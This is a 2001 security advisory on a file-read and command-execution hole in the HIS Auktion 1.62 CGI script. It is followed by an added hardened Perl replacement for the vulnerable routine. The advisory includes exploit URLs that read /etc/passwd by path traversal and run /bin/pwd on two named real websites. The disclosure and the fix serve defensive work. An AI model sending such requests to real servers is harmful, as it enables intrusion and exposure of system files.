From: UkR-XblP™ (cuctemaOK.RU)
Date: Mon Feb 12 2001 - 08:22:46 CST


    -----------UkR security team advisory #8------------
    HIS Auktion 1.62: "show files" vulnerability and remote
    command execution.
    --------------------------------------------------

    Name: HIS Auktion 1.62: "show files" vulnerability.
    Date: 11.02.2001
    Author: UkR-XblP
    About: "HIS Auktion 1.62" is a link-catalog CGI script.
    The creators' site: http://www.his-software.de
    Problem:
    -------from auktion.pl-------
    sub readfile {
    local($filename)=$_[0];   # first argument: the user-supplied file name
    local(@array);
    open(f,$filename);        # two-argument open: mode and path both come from $filename
    ----------------------------
    $filename is not filtered for special symbols.

    Exploit: http://www.victim.com/cgi-bin/auktion.pl?menue=path/to/any/file/or/command
    FIX: to fix the bug you need to add a check on the variable $filename
    to the script. For example: $filename=~s/(\[\]\;\:\/\$\!\$\&\`\\\(\)\{\}\")/\\$1/g;
    Example:
    http://www.zimmerauktion.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd
    |
    http://www.chess-international.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd

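As an added illustration that is not part of the advisory or of HIS Auktion itself, the Perl below shows one hardened replacement for a readfile() routine of the kind quoted above. Instead of escaping individual shell characters it allowlists the menu name, pins the file to a fixed directory, and uses three-argument open() so the mode is never taken from request data. The directory path, the ".txt" suffix and the sample inputs are assumptions made for the example.

```perl
#!/usr/bin/perl
# Added example, not code from the advisory or from HIS Auktion.
use strict;
use warnings;
use File::Spec;

# Assumed: menu pages live in one fixed directory and are plain text files.
my $BASE_DIR = '/var/www/auktion/menus';   # hypothetical path

# A menu name is safe only if it is a short plain token: no slashes, dots,
# pipes, quotes or other shell metacharacters, so "../" traversal,
# absolute paths and a trailing "|" are all rejected up front.
sub is_safe_name {
    my ($name) = @_;
    return defined $name && $name =~ /\A[A-Za-z0-9_-]{1,64}\z/;
}

# Return the file contents as a string, or undef if the request is unsafe
# or the file cannot be read.
sub safe_readfile {
    my ($name) = @_;
    return undef unless is_safe_name($name);

    # Build the path under the fixed directory; the allowlist above already
    # guarantees the result cannot escape $BASE_DIR.
    my $path = File::Spec->catfile($BASE_DIR, "$name.txt");

    # Three-argument open with an explicit '<' read mode. Unlike the
    # two-argument form open(f, $filename), Perl will not interpret a
    # leading or trailing '|' in the data as a request to run a command.
    open(my $fh, '<', $path) or return undef;
    local $/;                 # slurp the whole file
    my $content = <$fh>;
    close($fh);
    return $content;
}

# Constructed inputs showing what the allowlist accepts and rejects.
for my $menue ('start', '../../../../etc/passwd', '/bin/pwd|', 'a;ls') {
    my $verdict = is_safe_name($menue) ? 'accepted' : 'rejected';
    print "$menue => $verdict\n";
}
```

In a CGI handler the value passed to safe_readfile() would be the "menue" query parameter; a rejected name should produce a generic error page rather than echoing the input back, and the web server log line is the place to record the offending value for detection.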